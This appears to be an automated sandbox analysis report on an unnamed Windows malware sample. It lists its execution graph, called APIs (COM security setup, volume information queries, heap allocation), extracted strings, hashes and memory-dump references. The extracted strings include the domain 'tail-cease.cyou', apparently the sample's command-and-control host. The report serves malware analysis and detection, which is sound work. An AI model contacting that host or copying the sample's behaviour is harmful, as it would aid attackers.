          execution_graph 6767 14cf05 6768 14cf20 6767->6768 6773 179030 6768->6773 6770 14cf7a 6771 179030 5 API calls 6770->6771 6772 14d3ca 6771->6772 6774 179090 6773->6774 6775 1791b1 SysAllocString 6774->6775 6778 17966a 6774->6778 6777 1791df 6775->6777 6776 17969c GetVolumeInformationW 6781 1796ba 6776->6781 6777->6778 6779 1791ea CoSetProxyBlanket 6777->6779 6778->6776 6779->6778 6782 17920a 6779->6782 6780 179658 SysFreeString SysFreeString 6780->6778 6781->6770 6782->6780 6783 1489a0 6787 1489af 6783->6787 6784 148cb3 ExitProcess 6785 148cae 6792 17deb0 6785->6792 6787->6784 6787->6785 6791 14ce80 CoInitializeEx 6787->6791 6795 17f460 6792->6795 6794 17deb5 FreeLibrary 6794->6784 6796 17f469 6795->6796 6796->6794 6797 14d7d2 CoUninitialize 6798 14d7da 6797->6798 6799 161960 6800 1619d8 6799->6800 6805 159530 6800->6805 6802 161a84 6803 159530 LdrInitializeThunk 6802->6803 6804 161b29 6803->6804 6806 159560 6805->6806 6806->6806 6817 180480 6806->6817 6808 159756 6813 1596ca 6808->6813 6815 159783 6808->6815 6821 180880 6808->6821 6809 15974b 6827 1807b0 6809->6827 6810 15962e 6810->6808 6810->6809 6811 180480 LdrInitializeThunk 6810->6811 6810->6813 6810->6815 6811->6810 6813->6802 6815->6813 6831 17df70 LdrInitializeThunk 6815->6831 6819 1804a0 6817->6819 6818 1805be 6818->6810 6819->6818 6832 17df70 LdrInitializeThunk 6819->6832 6822 1808b0 6821->6822 6822->6822 6825 1808fe 6822->6825 6833 17df70 LdrInitializeThunk 6822->6833 6823 1809ae 6823->6815 6825->6823 6834 17df70 LdrInitializeThunk 6825->6834 6828 1807e0 6827->6828 6829 18082e 6828->6829 6835 17df70 LdrInitializeThunk 6828->6835 6829->6808 6831->6813 6832->6818 6833->6825 6834->6823 6835->6829 6836 14ceb3 CoInitializeSecurity 6837 17b7e0 6838 17b800 6837->6838 6838->6838 6839 17b83f RtlAllocateHeap 6838->6839

          Executed Functions

          Function 00179030 Relevance: 19.9, APIs: 5, Strings: 6, Instructions: 629memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 179030-179089 1 179090-1790c6 0->1 1->1 2 1790c8-1790e4 1->2 4 1790e6 2->4 5 1790f1-17913f 2->5 4->5 7 179145-179177 5->7 8 17968c-1796b8 call 17f9a0 GetVolumeInformationW 5->8 9 179180-1791af 7->9 13 1796bc-1796df call 160650 8->13 14 1796ba 8->14 9->9 11 1791b1-1791e4 SysAllocString 9->11 18 179674-179688 11->18 19 1791ea-179204 CoSetProxyBlanket 11->19 20 1796e0-1796e8 13->20 14->13 18->8 21 17966a-179670 19->21 22 17920a-179225 19->22 20->20 23 1796ea-1796ec 20->23 21->18 25 179230-179262 22->25 26 1796fe-17972d call 160650 23->26 27 1796ee-1796fb call 148330 23->27 25->25 28 179264-1792df 25->28 35 179730-179738 26->35 27->26 36 1792e0-17930b 28->36 35->35 38 17973a-17973c 35->38 36->36 37 17930d-17933d 36->37 49 179343-179365 37->49 50 179658-179668 SysFreeString * 2 37->50 39 17974e-17977d call 160650 38->39 40 17973e-17974b call 148330 38->40 46 179780-179788 39->46 40->39 46->46 48 17978a-17978c 46->48 51 17979e-1797cb call 160650 48->51 52 17978e-17979b call 148330 48->52 57 17964b-179655 49->57 58 17936b-17936e 49->58 50->21 61 1797d0-1797d8 51->61 52->51 57->50 58->57 60 179374-179379 58->60 60->57 63 17937f-1793cf 60->63 61->61 64 1797da-1797dc 61->64 69 1793d0-179416 63->69 65 1797ee-1797f5 64->65 66 1797de-1797eb call 148330 64->66 66->65 69->69 71 179418-17942d 69->71 72 179431-179433 71->72 73 179636-179647 72->73 74 179439-17943f 72->74 73->57 74->73 75 179445-179452 74->75 76 179454-179459 75->76 77 17948d 75->77 79 17946c-179470 76->79 80 17948f-1794b7 call 1482b0 77->80 81 179472-17947b 79->81 82 179460 79->82 90 1794bd-1794cb 80->90 91 1795e8-1795f9 80->91 86 179482-179486 81->86 87 17947d-179480 81->87 85 179461-17946a 82->85 85->79 85->80 86->85 89 179488-17948b 86->89 87->85 89->85 90->91 92 1794d1-1794d5 90->92 93 179600-17960c 91->93 94 1795fb 91->94 95 1794e0-1794ea 92->95 96 179613-179633 call 1482e0 call 1482c0 93->96 97 17960e 93->97 94->93 98 179500-179506 95->98 99 1794ec-1794f1 95->99 96->73 97->96 102 179525-179533 98->102 103 179508-17950b 98->103 101 179590-179596 99->101 109 179598-17959e 101->109 106 179535-179538 102->106 107 1795aa-1795b3 102->107 103->102 105 17950d-179523 103->105 105->101 106->107 110 17953a-179581 106->110 113 1795b5-1795b7 107->113 114 1795b9-1795bc 107->114 109->91 112 1795a0-1795a2 109->112 110->101 112->95 117 1795a8 112->117 113->109 115 1795e4-1795e6 114->115 116 1795be-1795e2 114->116 115->101 116->101 117->91
          APIs
          • SysAllocString.OLEAUT32(13C511C2), ref: 001791B7
          • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001791FD
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: AllocBlanketProxyString
          • String ID: =3$E!q#$E!q#$Lgfe$\$IK
          • API String ID: 900851650-3206278330
          • Opcode ID: f8891f24853018c478dc7a88bf0d2ba71238458a113bbb424a57b3f5b9c1308d
          • Instruction ID: 922c80a76a6a30f35463c438b19c591cbe51982d0594f45e3b20e1ff80c63f8e
          • Opcode Fuzzy Hash: f8891f24853018c478dc7a88bf0d2ba71238458a113bbb424a57b3f5b9c1308d
          • Instruction Fuzzy Hash: 592242B19083109BE324CF24C881B6BBBF6EF95314F148A1CF5999B2D1E775D909CB92
          Function 0014CF05 Relevance: 18.1, Strings: 14, Instructions: 574COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 118 14cf05-14cf12 119 14cf20-14cf5c 118->119 119->119 120 14cf5e-14cfa5 call 148930 call 179030 119->120 125 14cfb0-14cffc 120->125 125->125 126 14cffe-14d06b 125->126 127 14d070-14d097 126->127 127->127 128 14d099-14d0aa 127->128 129 14d0ac-14d0b3 128->129 130 14d0cb-14d0d3 128->130 131 14d0c0-14d0c9 129->131 132 14d0d5-14d0d6 130->132 133 14d0eb-14d0f8 130->133 131->130 131->131 134 14d0e0-14d0e9 132->134 135 14d0fa-14d101 133->135 136 14d11b-14d123 133->136 134->133 134->134 137 14d110-14d119 135->137 138 14d125-14d126 136->138 139 14d13b-14d266 136->139 137->136 137->137 140 14d130-14d139 138->140 141 14d270-14d2ce 139->141 140->139 140->140 141->141 142 14d2d0-14d2ff 141->142 143 14d300-14d31a 142->143 143->143 144 14d31c-14d36b call 14b960 143->144 147 14d370-14d3ac 144->147 147->147 148 14d3ae-14d3c5 call 148930 call 179030 147->148 152 14d3ca-14d3eb 148->152 153 14d3f0-14d43c 152->153 153->153 154 14d43e-14d4ab 153->154 155 14d4b0-14d4d7 154->155 155->155 156 14d4d9-14d4ea 155->156 157 14d4ec-14d4ef 156->157 158 14d4fb-14d503 156->158 159 14d4f0-14d4f9 157->159 160 14d505-14d506 158->160 161 14d51b-14d528 158->161 159->158 159->159 162 14d510-14d519 160->162 163 14d52a-14d531 161->163 164 14d54b-14d557 161->164 162->161 162->162 165 14d540-14d549 163->165 166 14d559-14d55a 164->166 167 14d56b-14d696 164->167 165->164 165->165 168 14d560-14d569 166->168 169 14d6a0-14d6fe 167->169 168->167 168->168 169->169 170 14d700-14d72f 169->170 171 14d730-14d74a 170->171 171->171 172 14d74c-14d791 call 14b960 171->172
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$B9CA0F78B9CB51ACD7CBBD6DF28D3732$N3F5$S7HI$tail-cease.cyou$y?O1$c]e$gy
          • API String ID: 0-4174026600
          • Opcode ID: 8b9876a586aa645a9a866b45d70e246b95d2c2985754366879d96441ead37971
          • Instruction ID: 94eb3708bbc451467d04ed4419f07c29fcd6d57684eb565d6156b71a5b3f28cb
          • Opcode Fuzzy Hash: 8b9876a586aa645a9a866b45d70e246b95d2c2985754366879d96441ead37971
          • Instruction Fuzzy Hash: 69120CB16483C18ED734CF25D495BEFBBE1ABD2304F18895CC4DA5B262C775090ACB92
          Function 001489A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 203 1489a0-1489b1 call 17cb70 206 1489b7-1489cf call 176620 203->206 207 148cb3-148cbb ExitProcess 203->207 211 1489d5-1489fb 206->211 212 148cae call 17deb0 206->212 216 148a01-148bda 211->216 217 1489fd-1489ff 211->217 212->207 219 148be0-148c50 216->219 220 148c8a-148ca2 call 149ed0 216->220 217->216 221 148c56-148c88 219->221 222 148c52-148c54 219->222 220->212 225 148ca4 call 14ce80 220->225 221->220 222->221 227 148ca9 call 14b930 225->227 227->212
          APIs
          • ExitProcess.KERNEL32(00000000), ref: 00148CB6
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: 12b1112140b16a7461ebbf6942f0985698c826292ff001a3cba4049c90e2bc6e
          • Instruction ID: 12181461fa026fdbf4feca05f5c05052b5dec3aaa7161593ecbe01ce5dc24443
          • Opcode Fuzzy Hash: 12b1112140b16a7461ebbf6942f0985698c826292ff001a3cba4049c90e2bc6e
          • Instruction Fuzzy Hash: 3B71F273B547044BC708DEAAD89236BFAD2ABC8714F09D83D6898D7390EAB89C054685
          Function 0017DF70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 234 17df70-17dfa2 LdrInitializeThunk
          APIs
          • LdrInitializeThunk.NTDLL(0017BA46,?,00000010,00000005,00000000,?,00000000,?,?,00159158,?,?,001519B4), ref: 0017DF9E
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID:
          • API String ID: 2994545307-0
          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
          Function 0017B7E0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 229 17b7e0-17b7ff 230 17b800-17b83d 229->230 230->230 231 17b83f-17b85b RtlAllocateHeap 230->231
          APIs
          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0017B84E
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: 9407317cec04aee758837317dcc12718d7925702db78179cb0d5fa64889216ac
          • Instruction ID: eed3d0bca7b4d3a6a7f32598bef50888fbb8492dde4ed14cc57ecf538181aef8
          • Opcode Fuzzy Hash: 9407317cec04aee758837317dcc12718d7925702db78179cb0d5fa64889216ac
          • Instruction Fuzzy Hash: D7017B33A457040BC300AE7CDCD4646BB56EFD9224F29463DE5D4873D0D631991A8296
          Function 0014CE80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 232 14ce80-14ceb0 CoInitializeEx
          APIs
          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0014CE94
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: Initialize
          • String ID:
          • API String ID: 2538663250-0
          • Opcode ID: b8713780a0a58de21ea8860542fbce7bb23dcf64d1d0b811d02a5cc95239a8a4
          • Instruction ID: 23fd7b8d9baa7bae52974f15fcc6be960e53d73b125b35bea9cac46ccd9d2991
          • Opcode Fuzzy Hash: b8713780a0a58de21ea8860542fbce7bb23dcf64d1d0b811d02a5cc95239a8a4
          • Instruction Fuzzy Hash: 15D0A73139024877D114A61CEC57F27325DC702754F440626B762CA6C2D951AA15C16A
          Function 0014CEB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 233 14ceb3-14cee2 CoInitializeSecurity
          APIs
          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0014CEC6
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: InitializeSecurity
          • String ID:
          • API String ID: 640775948-0
          • Opcode ID: 89fb739b9c62c49e9352a0ec85b25e5fd545dbece6b2f474fbf031d98bc269f3
          • Instruction ID: d62f7ba6a74aacc0874b2e04e7eaa60a7985a2c4af5520c8e1bbb14e40f8faa0
          • Opcode Fuzzy Hash: 89fb739b9c62c49e9352a0ec85b25e5fd545dbece6b2f474fbf031d98bc269f3
          • Instruction Fuzzy Hash: 26D012313D434176F97486089C57F1032458745F24F340B08B332FE6D2C9D17281870C
          Function 0014D7D2 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 265 14d7d2-14d7d8 CoUninitialize 266 14d7da-14d7e1 265->266
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: Uninitialize
          • String ID:
          • API String ID: 3861434553-0
          • Opcode ID: 1dcd2711873954fdc055d6f91dc1c19702a8450dcbeb4e9de15430f28f6a2438
          • Instruction ID: 7d6e026d51b3eec52d98fe1123961f4f3d8048845592b2dd0ff9a2425c85f475
          • Opcode Fuzzy Hash: 1dcd2711873954fdc055d6f91dc1c19702a8450dcbeb4e9de15430f28f6a2438
          • Instruction Fuzzy Hash: CFB01237B41008484B0010A478000CDF324D28103970017B3C318D2400D62251248184

          Non-executed Functions

          Function 00163D70 Relevance: 24.3, Strings: 19, Instructions: 515COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
          • API String ID: 1279760036-1524723224
          • Opcode ID: 6c314a6b607a6fccfb7d6bff56f6bcfadeb39f80a01629a45619af3736bc5843
          • Instruction ID: b84cda8191883ea41054e774fba82af748e2fc553f2edb052d05d302cec64596
          • Opcode Fuzzy Hash: 6c314a6b607a6fccfb7d6bff56f6bcfadeb39f80a01629a45619af3736bc5843
          • Instruction Fuzzy Hash: 4522BE7150C3908FD325CF28C8943AFBBE1AB96314F29882DE5D987392D7768895CB53
          Function 001494D0 Relevance: 17.9, Strings: 14, Instructions: 385COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
          • API String ID: 0-1787199350
